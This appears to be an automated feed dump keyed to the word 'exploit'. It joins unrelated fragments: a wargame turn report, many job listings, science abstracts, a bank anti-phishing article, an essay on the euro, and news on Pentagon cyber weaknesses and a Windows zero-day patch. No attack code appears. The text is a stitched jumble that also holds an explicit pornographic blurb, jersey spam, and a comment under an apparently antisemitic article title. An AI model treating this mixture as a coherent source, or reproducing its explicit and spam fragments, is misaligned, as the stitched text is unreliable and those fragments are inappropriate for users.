3) 1FF from Plymouth joins 1FF from Scapa Flow and then 8FF from Cherbourg for ST to Antwerp carrying the 3-4 in Cherbourg. Fleet joins path of mission 2).

DAS and Interception decisions:
1) Germans commit 6AF (1AF from Wilhelmshaven and 5AF from Leipzig) on Frankfurt.

DAS Interception decisions:
1) British commit 5AF from Antwerp for DAS interception on Frankfurt.

Here is the overall map showing all missions:

Please note that there are a couple of small errors in the picture above.
1) Somehow it shows 1AF of Russian GS, not 2 as it should.
2) Somehow a 9FF from Scapa Flow was accidentally picked up together with the other fragments. This needs to be ignored.



Here is the situation before DAS interception resolution in the West:


British roll a 3-5 losing the DAS interception and 3AF while 2AF get inverted in Antwerp. Germans lose 1AF from Leipzig and continue their DAS mission.

Here is the situation after conclusion of all missions and before ground combat roll resolution in the West:


And in the Med:


Overall map just before ground combat rolls. Note that the error in Russian GS has been corrected, but not the one with the wrongly picked up fleet from Scapa Flow.


Ground combat rolls:
USSR: 2x3-5 and 2AF of GS vs 2-3 Greek unit at CC27, 8 vs 4, 2:1. Roll is D
UK: 2x3-4 and 2AF of GS in Oslo, 8 vs 4, 2:1. Roll is EX-CA. Norway conquered
France: 2x2-3 from Luxembourg and 1x3-5 vs. Bonn 3-3, 7 vs 6, 1:1. Roll is EX
France: 4x2-3 vs 4-6 in Stuttgart, 8 vs 8, 1:1. Roll is D
UK: 2x4-5 and 2x3-4 vs 1x3-3 in Brussels, 14 vs 6, 2:1. Roll is EX
There will be no exploitation movement
Ahead of exploitation combat, the Russians announce 2AF of GS from Izmir against DD27 in Greece

Here is the situation post Combat not including exploitation in the West:

And in the Med just before exploitation combat:

Exploitation combat (2x3-5 and 2AF vs 2-3 (doubled)) in Greece rolls an EX for the Russians.
There is no Med attrition roll for UK and France, as there are no units in contact anywhere.

Here is the post-combat phase overall situation: Note that in prior files there was some misallocation of which German units did DAS and which were inverted. It is corrected now…


UNIT CONSTRUCTION:
USSR will spend 6 BRP for construction, rebuilding the 3-5 lost during exploitation in Greece.
USSR BRP at 102 (35)
UK: 1x5-4, 4x3-4, 1 replacement. A total of 28BRP. Down to 62(30)
France: 1x5-4, 1x3-5, 4x2-3, 3 replacements. A total of 32BRP. Down to 33(0)
Overall map after builds and before SR phase: Note that I have now corrected the accidentally picked up uncommitted 9FF from Scapa Flow, which are used for Sea Escort.


SR phase

France:
1) French Replacement to Venice
2) French rep to T25
3) 3AF from Metz to Q20
4) 2-3 from Marseilles to Metz
5) 4FF from Beirut to Lorient
UK:
1-4) 4X3-4 from UK mainland and Norway to O23 and P23 in France and to Rome using 4x9FF for Sea Escort
5) Rep to Portsmouth from J25
6) And 7) 3-4 and 1-4 AF to Rennes and Caen

Soviet Union
1) 1-3 from Rostov to L38
2) 2-3 from Rostov to BB27
3) 3-5 to Salonika
4+5) 2 x 3-3 1hex west from Salonika
6) 5 (2-3) to BB27
Here is the board post SR:


And at the end of turn after removal of unsupplied French 2-3 in Dieppe.

Western Allies end up with 95 BRP which is the exact same total as the Germans. They are guaranteed to maintain the initiative.


Summary:
The allies had objectively a bad turn, and not only in terms of rolls, but more importantly also in terms of strategy and tactics. Their grand plan was to “trick” the Germans into overcommitting their AF but it backfired royally, as the Germans used exactly the minimum 5AF to spoil the allied grand plan. The French defense now has a notable weakness in the North, where the Germans can attack relentlessly solely on the French and ignore the British, while they still enjoy overwhelming air superiority. The allies should have air-attritioned the Germans and forced them to commit as much DAS as possible, but they failed to do so. With all their hopes pinned on a coin-toss 1-1 attack, and no effective defense against the panzers, the French now seem quite vulnerable. The airborne is not ZOCed, and from Wilhelmshaven is a threat to both England and Paris. Norway was conquered by UK…but it did cost valuable BRPs…The Russians had some success in Greece, but with the fall of France looking imminent, they had better watch their back…Overall, it seems that the allies are ready to pay for their arrogance next turn. More to come, soon! Stay tuned!

Linux Systems Operations Specialist 3112904 - Morgan Stanley - Montréal, QC
Must have solid knowledge of and excellent experience with Linux, preferably Red Hat or other Linux distributions. - Solid knowledge and...
From Morgan Stanley - Sun, 16 Sep 2018 09:21:11 GMT
Development and Operations (DevOps) Specialist 3117231 - Morgan Stanley - Montréal, QC
Ant, Gradle or other similar tools and frameworks - Experience with Jenkins, Sonar, Fortify, BDD, Selenium and other standard coverage tools and...
From Morgan Stanley - Mon, 30 Jul 2018 21:25:46 GMT
First study of migrant sex workers

The majority of migrant sex workers in New Zealand who participated in new University of Otago research are in safe employment situations and working to fund study or travel, rather than being desperate, exploited or trafficked, the research shows.


Part-Time Professor - Network Systems and Components - Durham College - Oshawa, ON
This is a necessary foundation for further investigations and the testing of remedial actions covered in the Access Controls, Hacking & Exploits and Network...
From Durham College - Wed, 26 Sep 2018 07:27:59 GMT - View all Oshawa, ON jobs
Rockford Scanner™: Rockford Man Exposes Penis To A Young Girl Walking To School
    EXPLOITATION ARREST: A Rockford man faces charges after a weeks-long investigation. Detectives from the Sensitive Crimes Unit conducted an investigation after a juvenile walking to Gregory School (4820 Carol Court) on September 19, 2018, reported that a man exposed himself to her. On Tuesday, October 9, 2018, officers took 26-year-old Darren Coleman into …
Optimization of conditions to extract high quality DNA for PCR analysis from whole blood using SDS-proteinase K method.

Saudi J Biol Sci. 2017 Nov;24(7):1465-1469

Authors: Qamar W, Khan MR, Arafah A

Abstract
In studies of human genetics, genomics and pharmacogenetics, genomic DNA is extracted from buccal cells, whole blood, etc. Researchers exploit several methods to extract DNA from whole blood. One of these, which uses the cell-lysis and proteolytic properties of sodium dodecyl sulfate (SDS) and proteinase K respectively, may be called the SDS-PK method. It does not involve hazardous chemicals such as phenol or chloroform and is inexpensive. However, several researchers report the same method with different formulas and conditions. During our experiments with whole-blood DNA extraction we encountered problems such as protein contamination and poor DNA purity and yield when following some SDS-PK protocols reported elsewhere. A260/A280 and A260/A230 ratios, along with PCR amplification, give a clear idea of the procedure that was followed to extract the DNA. In an effort to increase DNA purity from human whole blood, we identified steps of the protocol that play a crucial role in the extraction of high-quality DNA.

PMID: 30294214 [PubMed]


BCEJP00017403 - Senior Security Analyst - Modis Canada - Montréal, QC
Senior Security Analyst. Responsible for the planning, design, construction and operation of the networks of the multi-billion-dollar company...
From Modis Canada - Fri, 05 Oct 2018 21:37:09 GMT - View all Montréal, QC jobs
Pentagon slow to protect weapon systems from cyber threats: U.S. agency
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.
5 Ways Banks Can Combat Phishing
By Phil Goldstein, Tue, 10/09/2018 - 08:21

More than a third — 35.7 percent — of the 107 million attempts to visit phishing pages halted by Kaspersky Lab technologies in the second quarter of 2018 were related to financial services, the company recently reported.

Customers were targeted primarily via fraudulent banking or payment pages, the report states. Those insights point to the need for consumers to exercise extreme caution when browsing online banking sites. Attacks on financial organizations' customers, including banks, payment systems and e-commerce transactions, remain a continuing trend in cybercrime. Typically, those crimes result in theft of money as well as personal data.

“The permanence of attacks targeting financial organizations reflects the fact that more and more people use electronic money,” observes Nadezda Demidova, lead web content analyst at Kaspersky Lab. “Still, not all of them are sufficiently aware of the possible risks, so intruders are actively trying to steal sensitive information through phishing.”

While there’s a lot of good information available to help customers improve their security awareness, what can banks do to better protect themselves from ever-increasing phishing threats? 

“Phishing techniques are similar across all industries, but it’s clear that some organizations — like banks — can experience more immediate and severe repercussions from a successful attack, just based on the nature of their business and the sensitivity of the customers they support,” says Gretel Egan, security awareness and training strategist for Wombat Security, a division of Proofpoint.

In speaking to Egan and Steven D’Alfonso, a research director at IDC Financial Insights, we developed the following list of five tips for banks and credit unions:


1. Identify Staff Who Have Opportunity and Access

Banks should identify staff members beyond the C-suite and management teams who have access to customer information and other business-critical data and systems, because cybercriminals certainly have, Egan says. Attackers mine social media and public websites, among other sources, to identify key individuals, such as loan officers, before targeting them directly. 

2. Get Serious About Security Awareness Training

Employees who transfer funds regularly, manage sensitive data or participate in important business functions need additional training on how to spot and avoid more sophisticated phishing traps, Egan says. Cybercriminals frequently exploit employees’ fear and anxiety to solicit a quick (and unsafe) response to a targeted email. It’s a good idea for users to ask themselves these questions about any email they receive: Was I expecting this message? Does this email make sense? Am I being pushed to act hastily or out of fear? Does this seem too good to be true? What if this is a phishing email?

3. Focus on Public-facing Information

Bank and credit union technology teams should communicate with marketing and C-suite teams about the potential hazards of sharing company details on public channels such as public-facing websites or social media, Egan advises. That can be a double-edged sword in the banking world, where organizations strive to make it easy for customers to contact them, while still offering protection from cybercriminals and social engineers. Egan cautions that if information such as general email aliases, phone numbers, or lists of bank staff and their roles are visible publicly, cybercriminals will use the information to launch phishing attacks. IT staff should monitor all inbound email channels (even aliases) and train personnel who respond to inbound communications to recognize and avoid malicious messages.

4. Deploy Products that Analyze Malware-like Behavior

Banks should consider deploying tools such as IBM’s Trusteer Rapport, which uses advanced analytics and machine learning to analyze suspicious behavior, increasing the chances that the software will detect and remove malware before it can infect a computer or broader network, IDC’s D’Alfonso says. Many banks now offer Trusteer as a free service for users to download before continuing any e-commerce functions. 

5. Consider Continuous Authentication

Behavioral biometric products that feature continuous authentication can detect unauthorized users, such as a fraudster or a bot, D’Alfonso says. Such new tools help users safely authenticate and transfer money or pay bills, while continuous authentication keeps watch during every step of the process.

Staying on top of phishing requires consistent training and adjustments on the part of any organization looking to combat ever-evolving threats. And while new behavioral and analytics tools can help, banks and credit unions can also achieve a great deal simply by keeping better tabs on employees and offering frequent training updates.



Mauritania: Senior Executive Associate, GS6, Nouakchott, Mauritania
Organization: UN Children's Fund
Country: Mauritania
Closing date: 23 Oct 2018

UNICEF works in some of the world’s toughest places, to reach the world’s most disadvantaged children. To save their lives. To defend their rights. To help them fulfill their potential.

Across 190 countries and territories, we work for every child, everywhere, every day, to build a better world for everyone.

And we never give up.

For every child, [insert tagline]

Mauritania, officially named the Islamic Republic of Mauritania, is a West African country. It has borders with Algeria, Western Sahara, Mali and Senegal, and access to the Atlantic Ocean. Its borders look like straight lines because they were drawn by the colonizing country, France. Its capital is Nouakchott.

This country is very arid. A large part of its territory is desert, which explains the small number of the population despite its large surface area. The population density, in terms of the number of people per square kilometer, is low (about 3 people per km²).

UNICEF mission is to promote the rights of every child, everywhere, in everything the organization does - in programmes, in advocacy and in operations.

How can you make a difference?

This position reports to a senior executive with responsibility for the management and coordination of work for a broad segment of the Organization (i.e. major program, sector, or office). The role of this post is to provide administrative and secretarial support services to the senior executive.

The Sr. Executive Assistant is responsible for ensuring the smooth running of the Office. This involves management of information and coordination of matters within a substantive team. The post is a key interface with a broad range of contacts, including high-ranking officials, both within and outside the Organization. The post prioritizes tasks and organizes work independently based on general direction from the supervisor.

To qualify as an advocate for every child you will have…

  • Completion of Secondary School Education. High School Diploma, and business courses or other relevant disciplines
  • A minimum of 6 years of experience in accounting, financial or budget work, including on the job training in accounting and financial procedures and systems. Knowledge and skills in using corporate financial systems as well as standard office computer applications.
  • Five years of office support work experience, including, organizing and supervising the whole range of office support and administrative activities. Ability to work with minimum of supervision. Ability to extract and format data and to solve operational problems. Ability to organize own and others work, set priorities and meet deadlines. Ability to organize meetings and events. Ability to handle work quickly and accurately under time constraints
  • Fluency in French and English is required. Knowledge of Arabic is an asset.

For every Child, you demonstrate…

    UNICEF’s core values of Commitment, Diversity and Integrity and core competencies in Communication, Working with People and Drive for Results.

    UNICEF has a zero-tolerance policy on sexual exploitation and abuse, and on any kind of harassment, including sexual harassment, and discrimination. All selected candidates will, therefore, undergo rigorous reference and background checks.

    The technical competencies required for this post are….

    View our competency framework at

    http://www.unicef.org/about/employ/files/UNICEF_Competencies.pdf

    UNICEF is committed to diversity and inclusion within its workforce, and encourages all candidates, irrespective of gender, nationality, religious and ethnic backgrounds, including persons living with disabilities, to apply to become a part of the organization.

    Remarks:

    Mobility is a condition of international professional employment with UNICEF and an underlying premise of the international civil service.

    Only shortlisted candidates will be contacted and advance to the next stage of the selection process.


    How to apply:

    UNICEF is committed to diversity and inclusion within its workforce, and encourages qualified female and male candidates from all national, religious and ethnic backgrounds, including persons living with disabilities, to apply to become a part of our organization. To apply, click on the following link http://www.unicef.org/about/employ/?job=516839


Foothill Brings CG Sitcom ‘Danny & the Dinogons’ to MIPCOM
    Foothill Entertainment Inc., has joined with India’s Storywalker Designs, creators of the popular app Storywalker 365, to develop, finance and exploit the new series Danny and the Dinogons. Intended as a CGI preschool sitcom that celebrates family, diversity and kindness, the series debuts at MIPCOM this month. The show is about the not so normal […]
The origins of Bentancur, a Juve certainty

    The origins of Bentancur, a Juve certainty

    First goal with Juve for the talent born in 1997, a feat dedicated to his mother Mary, who died when he was four and whom he remembers on his shirt and on his skin. "Lolo" grew up fast, both in height and on the pitch, thanks to his humility and the closeness of his family. A fixture in Tabarez's Uruguay, he is more than an alternative for Allegri's side.

    UDINESE-JUVE 0-2, BENTANCUR AND CR7 SCORE. GOALS AND HIGHLIGHTS

    SERIE A, RESULTS - STANDINGS

    Keywords: serie a, juventus

An alarming report shows hackers can break into US weapons systems in less than an hour - Business Insider

    A new Government Accountability Office (GAO) report shows Department of Defense vulnerabilities stemming back to the 1990s. Hackers used unsophisticated, easily accessible equipment to access a DoD weapons system in only one hour. Current ...

    Related: Government watchdog says US weapons systems are vulnerable to hacks, but the Pentagon is slow to act (TechCrunch)

10/10/2018: BUSINESS: Taxman sues over alleged R&D rort
    Disgraced tax accountant Paul Bogiatto used a call centre to lure customers into a research and development tax exploitation scheme, a court has been told. The Australian Taxation Office has launched Federal Court action against Mr Bogiatto, who was...
VMware's CEO has a vision that should terrify the security industry: 'Start getting rid of products' (VMW)


    • In an interview on Monday at the Best of Breed conference, VMware CEO Pat Gelsinger said that right now, companies are using too many security products — grim tidings for anybody trying to sell security products to those companies. 
    • By using multiple products, they're creating more cracks in their security infrastructure, where attackers could hypothetically get in.
    • Gelsinger says the goal is to reduce the number of security products used to help protect VMware itself down to 15. 
    • To do this, VMware will build more security features directly into its own products.

    The problem with the security industry, says VMware CEO Pat Gelsinger, is that companies are using too many security products. If you want to be more secure, he says, "start getting rid of products."

    Indeed, Gelsinger's big idea for disrupting cybersecurity is to get companies using fewer security products, and rely more on products that already have security baked in, he said in an interview with CRN on Monday at the 2018 Best of Breed conference in Philadelphia.

    About two years ago, VMware used 30 security products to protect its own employees and systems from cyberattack, but now it uses fewer than 20. The lesson, he says, is that VMware is now both more secure and less reliant on piling on new tools from outside vendors.

    “Your customers are looking for more and just giving them another warm blanket, expecting that’s going to stop bullets doesn’t do it,” Gelsinger said. “Your customers want less products, they want more value — and particularly in the security area that’s true. We think VMware is a critical component of that as you’re building those capabilities.”

    Gelsinger says the goal is to reduce VMware's usage of security products even further, down to 15 security solutions, which the company will do by building more basic security functions and encryption directly into its own products, including NSX, vSan and AppDefense. That vision could be bad news for the very many security startups out there, who are all selling to a finite number of businesses in the world. 

    Having fewer security products may seem counterintuitive as a way to fight cyberattack, but too many security products can create opportunity for attackers. A complicated, patchwork security infrastructure can slow down the detection of threats and makes it easier for attackers to find and exploit any software vulnerabilities. The average enterprise deploys 75 different security products, according to SafeBreach, an internet security company. Gelsinger also cited a meeting he had with a CIO of a top bank, who said that his company uses 250 security vendors.

    "How do you make all that work, right? The patches of the patches, and integration—it's just nuts and that has got to get much simpler," Gelsinger said.

    It may take a few years before Gelsinger and VMware successfully reduce their reliance on dedicated security tools —  but ultimately, the company hopes to have fewer external vendors and platforms to rely on, while making its own infrastructure platform more secure. In the meanwhile, he urges companies to encrypt their data, so it can't be cracked even in the event of a security incident.

    “You should always have data encrypted,” Gelsinger said. “There’s still lots of breaches, but this dramatically reduces the attack surface.”



The 1% Windfall: How Successful Companies Use Price to Profit and Grow

    “This breakthrough ‘how to’ book offers a practical and comprehensive framework that shows companies how to use price to drive profits from diverse customer segments in offensive and defensive (recession, inflation, and new competitor) situations.” — Richard Spaulding, Member of the Board of Directors, Scholastic Corporation. Rafi Mohammed, author of The Art of Pricing, shows businesses how to reap financial windfalls and sustain growth using the underexploited and often overlooked strategy of setting prices.
New did guys assisted surprised defense wholesale nfl jerseys from china
    For example, improving RB as a power back might mean boosts strength Cheap NFL Jerseys Nike and stiff arm, while a receiving back might get boosts agility and catching. One of the things that I want to try to do is to make sure we are the best position to win. He clicked with a […]
Oct 9, 2018: AIM Seminar: Training Neural NLP Models in Minimally Supervised Settings at Northeastern University

    Speaker: Byron Wallace (CCIS, NU)

    Abstract: Modern neural models have achieved remarkably strong results in natural language processing (NLP) in recent years, achieving state-of-the-art performance across a range of domains and tasks. However, such models tend to be data-hungry, requiring large annotated training corpora to work well. This requirement impedes their use in specialized domains wherein direct supervision is expensive to collect, and hence sparse. I will discuss strategies for training such models with minimal labeled data. In particular these include strategies for active learning (AL) and approaches that exploit domain knowledge and other sources of indirect supervision. Finally, I will discuss approaches to efficient model transfer, including learning disentangled representations of texts.



Oct 10, 2018: GASC Seminar "Roots of polynomial systems, Hilbert scheme, and singular points" by Bernard Mourrain (INRIA: Sophia Antipolis, U. Cote d'Azur) at 511 Lake Hall

    Abstract: A key ingredient in computer algebra for solving polynomial equations is the computation of a normal form, via a good presentation of the ideal generated by these polynomials. This can involve a Groebner basis or border basis computation. From such a normal form, one can then deduce the algebraic structure of the quotient algebra and effectively recover all the solutions of the equations.

    We are interested in analyzing normal forms which are known partially. We first present algorithmic characterizations of normal forms based on commuting relations and rank conditions. We show how these lead to efficient methods for finding roots of polynomial equations, which we illustrate by some numerical experimentation.

    We show how one can deduce equations for the variety of Artinian algebras associated to r roots with a given basis. We develop the connection with the Hilbert scheme of r points, providing defining equations of degree 2 in the Plucker coordinates of the Grassmannian of r-spaces.

    In a more local setting, the characterization of normal forms can be used to define deflated systems of equations defining a multiple root and its inverse system. The singular isolated root of the initial system corresponds to a simple root of this extended system. We show how to exploit it in numerical iterative methods such as Newton iteration to obtain a quadratically converging method to a singular isolated root. Some examples illustrate the approach.

    This involves works done in collaboration with Mariemi Alonso, Jerome Brachat, Jonathan Hauenstein, Agnes Szanto, Simon Telen, Marc Van Barel.



Assistant – Operations, Wind and Solar Energy | #ADM172 - innergex - Windthorst, SK
    JOB POSTING #ADM172 POSITION: ASSISTANT – OPERATIONS, WIND AND SOLAR ENERGY WINDTHORST, TEXAS (USA) COMPANY PROFILE Innergex Renewable Energy Inc. is a...
    From innergex - Thu, 04 Oct 2018 18:55:39 GMT - View all Windthorst, SK jobs
UToledo study details link between social media and sex trafficking
    (University of Toledo) Social media is increasingly being exploited to contact, recruit and sell children for sex, according to a study by The University of Toledo Human Trafficking and Social Justice Institute. (Source: EurekAlert! - Social and Behavioral Science)



Michal Pavlas, Petr Matijka
    These horny homosexuals are truly passionate in their love-making. They wake up after a long night's sleep to a passionate kiss, regardless of the filthy cock breath from their exploits the night before. Things don't stop there, as one man rolls over on top of the other, pinning him down and running his hands all over his hard body.
Transport, Owner-Operator - Williams Pharmalogistique - Saguenay, QC
    Williams Pharmalogistique is looking for transport contractors with the following equipment for the CHICOUTIMI / SAGUENAY regions:....
    From Indeed - Wed, 08 Aug 2018 14:42:45 GMT - View all Saguenay, QC jobs
Heavy Vehicle Mechanic (Candidate Pool) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC
    Please note that this position requires relocation to the town of Fermont. Rebuild, overhaul, repair and adjust all equipment fitted with an engine... $39.76 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:46:11 GMT - View all Fermont, QC jobs
Mining Equipment Operator (Candidate Pool) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC
    Please note that this position requires relocation to the town of Fermont. Under the supervision of the mining operations foreman, the incumbents... $35.78 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:54 GMT - View all Fermont, QC jobs
Maintenance Mechanic (Candidate Pool) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC
    Please note that this position requires relocation to the town of Fermont. Reporting to the foreman of the relevant department, the mechanics carry out the... $39.76 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:48 GMT - View all Fermont, QC jobs
Blaster - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC
    Please note that this position requires relocation to the town of Fermont. Prepare the drill holes for blasting, such as:.... $38.44 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:39 GMT - View all Fermont, QC jobs
Forrest Gump (Blu-Ray)
    The extraordinary exploits of a simpleton who is by turns a war hero, shrimp-boat owner, ping-pong champion and football star.
Punk Rock vinyl wall clock, Exploited / Che Guevara - Current price: 3 390 Ft

    Punk Rock vinyl wall clock, Exploited / Che Guevara
    Current price: 3 390 Ft
    Auction ends: 2018-10-10 03:27
Find Me a 100 Winner: Trust these wind specialists at Walton Heath
    Paul Krishnamurty recommends a trio of outsiders and another trio of alternatives who he fancies to exploit conditions in the British Masters at Walton Heath...
Why the Euro Won't Replace the Dollar / Barron's Magazine

    Why the Euro Won’t Replace the Dollar

    By Matthew C. Klein

    Europe has a dream that the euro will overtake the U.S. dollar as the world’s reserve currency. It’s an old dream, but it’s based on a misconception.

    In his last State of the Union speech as president of the European Commission, Jean-Claude Juncker pledged “to strengthen the international role of the euro.” Yet the dollar’s preponderance in foreign reserves and in international trade comes from specific properties of the U.S. financial system that most European governments do not want to emulate. Global use of the euro is incompatible with the other priorities of European governments, particularly sovereign debt reduction.

    European complaints about the dollar are not new. The seeds were planted shortly after the D-Day landings, when the Allies agreed at the Bretton Woods Conference to create a postwar monetary regime of fixed exchange rates centered on the dollar. This dollar-based payments system gave Europeans good reason to hold safe dollar-denominated assets they could use to settle debts or pay for imports in emergencies. Those reserve assets lubricated international trade, but they were also debts Americans owed to the rest of the world.

    In the 1950s and 1960s, those debts funded growing financial outflows from the U.S. The U.S. had effectively become the world’s bank, exploiting its overvalued exchange rate to buy long-term risky assets abroad with funds raised from short-term “deposits” sold to foreigners. The French particularly resented what they saw as an “exorbitant privilege” that allowed Americans to buy European assets on the cheap. Europeans eventually responded by converting their dollars into gold bullion at the official U.S. fixed price of $35 an ounce.

    The Nixon administration was unwilling to defend an arbitrary exchange rate by stifling American domestic spending or selling all the Treasury’s bullion. Instead, it officially broke the dollar’s link to gold in 1971. The supposed privilege had actually been a burden: Foreigners accumulated reserves at the expense of Americans borrowing more and more from the rest of the world. By 1971, those debts had become unpayable—and rather than honor its obligations in gold, the U.S. government effectively defaulted.

    This did not end foreign demand for U.S. financial assets—much to the annoyance of the architects of the euro. The “One Market, One Money” report, published in 1990 by the European Commission, complained that “permanent asymmetries regarding the burden of adjustment have persisted…because of the special international significance of the dollar.” They hoped their new single currency “could finally be a decisive building block for a more stable multi-polar monetary regime.”

    The report’s authors failed to appreciate that the dollar’s “international significance” requires Americans to satisfy foreign demand for dollar-denominated fixed income by increasing their indebtedness. This was demonstrated most clearly in the 2000s. Many emerging markets were traumatized by the crises of the late 1990s and were determined to avoid a repeat. At the same time, oil exporters were enjoying a windfall thanks to soaring prices and wanted to save in preparation for the eventual reversal. The combined effect was a large increase in the demand for safe assets in hard currencies.

    While the U.S. federal government consistently ran budget deficits, the growth in public debt was far too small to satisfy foreign savers. Financial innovations, most notably “private label” mortgage bonds and their derivatives, were therefore needed to bridge the gap between supply and demand. This turned out to be a disaster for both the mortgage borrowers and many of the end investors, but it was the only way to reconcile foreigners’ seemingly insatiable need to hold U.S. bonds with America’s relatively restrictive fiscal policy.

    This unfortunate episode shows why the euro is unlikely to achieve equivalent status to the dollar: Beyond the likely unwillingness of the European private sector to go on a borrowing binge so soon after the financial crisis, there is already an acute shortage of safe euro-denominated assets available. Moreover, this shortage is being made worse by policy.

    In 2007, the governments of the euro area had about €4.8 trillion ($5.6 trillion) in debt securities outstanding. Back then, all of that debt was considered equally “safe” by regulators, monetary policy makers, and—crucially—by investors.

    The total face value of euro-area government bonds has since grown to nearly €8 trillion, but that number needs to be adjusted for credit risk, since the new European consensus is that countries unable to raise funds in the markets will have to default on their obligations. Less than €2 trillion of euro-area sovereign bond debt is issued by AAA-rated borrowers (Germany, Luxembourg, and the Netherlands), and even adding in the relatively safe countries of Austria, Finland, and France only brings the total up to €4.1 trillion. Moreover, the European Central Bank has bought roughly €1.1 trillion of those bonds, shrinking the supply available for investors still further.

    This shortage is being exacerbated by the obsessions of policy makers. A new joint proposal to reform the euro area’s budget rules from France’s Council of Economic Analysis and Germany’s Council of Economic Experts, for example, explicitly says that “a major aim of our proposed rule is to reduce public debt.” The German government has already been paying down its debt for several years, even though an anonymous former International Monetary Fund economist convincingly argues that German government debt “could reasonably—and quite sustainably—approach 240 percent of GDP,” given the country’s high level of domestic savings.

    There is no inherent reason why the euro could not become a credible alternative to the dollar for international payments and reserves. All the Europeans would need to do is replace their national sovereign debts with a single government bond market explicitly backed by the ECB and unconstrained by any fiscal rules. Until they are prepared to do that, however, Juncker’s ambition will remain nothing more than a dream.
              Pentagon slow to protect weapon systems from cyber threats - U.S. agency
    The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

              The incredible Christian love story of King Baudouin and Queen Fabiola...
    Throughout the centuries royalty have been at the center of many conflicts over religion, land, and power. There have been some bloodthirsty royals whose exploits have had an impact on society today — just think of Henry VIII with his penchant for killing off wives, and who brought about the English Reformation. However, fortunately...
              Microsoft Patches Windows Zero-Day Exploited by 'FruityArmor' Group

    Microsoft's Patch Tuesday updates for October 2018 resolve nearly 50 vulnerabilities, including a Windows zero-day flaw exploited by an advanced persistent threat (APT) actor known as FruityArmor.



              Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says - NPR

    NPR: Passwords that took seconds to guess, or were never changed from their factory settings. Cyber vulnerabilities that were known, but never fixed. Those are two common problems plaguing some of the Department of Defense's newest weapons systems, ...

    Watchdog: 'Nearly all' new US weapons systems vulnerable to cyber attacks (CNN)
    An alarming report shows hackers can break into US weapons systems in less than an hour (Business Insider)
    Weapon Systems Cybersecurity (Government Accountability Office)

              Comment on The Jewish Hand in the World Wars, Part 1, by Thomas Dalton
    E=mc² is used to indicate the rest energy of a mass, but you will also encounter the equation E_tot=γmc². E_tot (E with subscript tot for total) is the sum of rest energy plus kinetic energy (E_kin or KE), and γ is gamma, the Lorentz factor. γ=1/√(1–v²/c²), where v is the relative velocity between inertial frames and c is the speed of light in vacuum. So... E_tot = mc² + E_kin = γmc². γ becomes very close to 1 if v is very small compared to c, in which case E_tot is very close to mc². Ron Unz obtained a physics degree iirc, so probably at one time he knew this stuff backwards and forwards, or well enough to pass the midterm and final exams of the classes covering post-Galilean relativity. Maybe he wouldn't mind exploiting this background by publishing a semi-rigorous piece on the topic of relativity, with a history of its development and some comments about the doubt that Einstein was the prime mover responsible for E=mc².
              Transport, Owner-Operator - Williams Pharmalogistique - Saguenay, QC
    Williams Pharmalogistique is looking for transport contractors with the following equipment for the CHICOUTIMI / SAGUENAY regions:....
    From Indeed - Wed, 08 Aug 2018 14:42:45 GMT - View all Saguenay, QC jobs
              How to Use Fail2ban to Secure Your Linux Server

    TecMint: By reviewing your server logs, you may often find different attempts for brute force login, web floods, exploit seeking and many others.


              Hotel Reservation Call Centre Supervisor (M/F)
    Since 1989, Groupe RESIDE ETUDES has designed and operated serviced residences, …
              Wireless Sales Associate - Sept Iles - OSL Retail Services Inc - Sept-Îles, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Mon, 24 Sep 2018 13:21:37 GMT - View all Sept-Îles, QC jobs
              Wireless Sales Associate - Alma - OSL Retail Services Inc - Alma, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Fri, 06 Jul 2018 01:21:59 GMT - View all Alma, QC jobs
              Wireless Sales Associate - Val D'Or - OSL Retail Services Inc - Val-d'Or, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Thu, 20 Sep 2018 01:20:16 GMT - View all Val-d'Or, QC jobs
              Wireless Store Manager - OSL Retail Services Inc - Québec City, QC
    Then OSL is for you. At OSL, we know how to reward our employees. Walmart Canada has partnered with OSL to operate its 350 wireless stores...
    From OSL Retail Services Inc - Mon, 17 Sep 2018 19:20:40 GMT - View all Québec City, QC jobs
              Wireless Sales Associate - Levis - OSL Retail Services Inc - Lévis, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Thu, 04 Oct 2018 19:19:16 GMT - View all Lévis, QC jobs
              Wireless Sales Associate - Victoriaville - OSL Retail Services Inc - Victoriaville, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Wed, 03 Oct 2018 13:20:36 GMT - View all Victoriaville, QC jobs
              Wireless Sales Associate - Ste-Agathe des Monts - OSL Retail Services Inc - Sainte-Agathe-des-Monts, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Wed, 22 Aug 2018 19:20:44 GMT - View all Sainte-Agathe-des-Monts, QC jobs
              Wireless Store Manager - Joliette - OSL Retail Services Inc - Joliette, QC
    Then OSL is for you. At OSL, we know how to reward our employees. Walmart Canada has partnered with OSL to operate its 350 wireless stores...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:20:02 GMT - View all Joliette, QC jobs
              Wireless Sales Associate - Joliette - OSL Retail Services Inc - Joliette, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
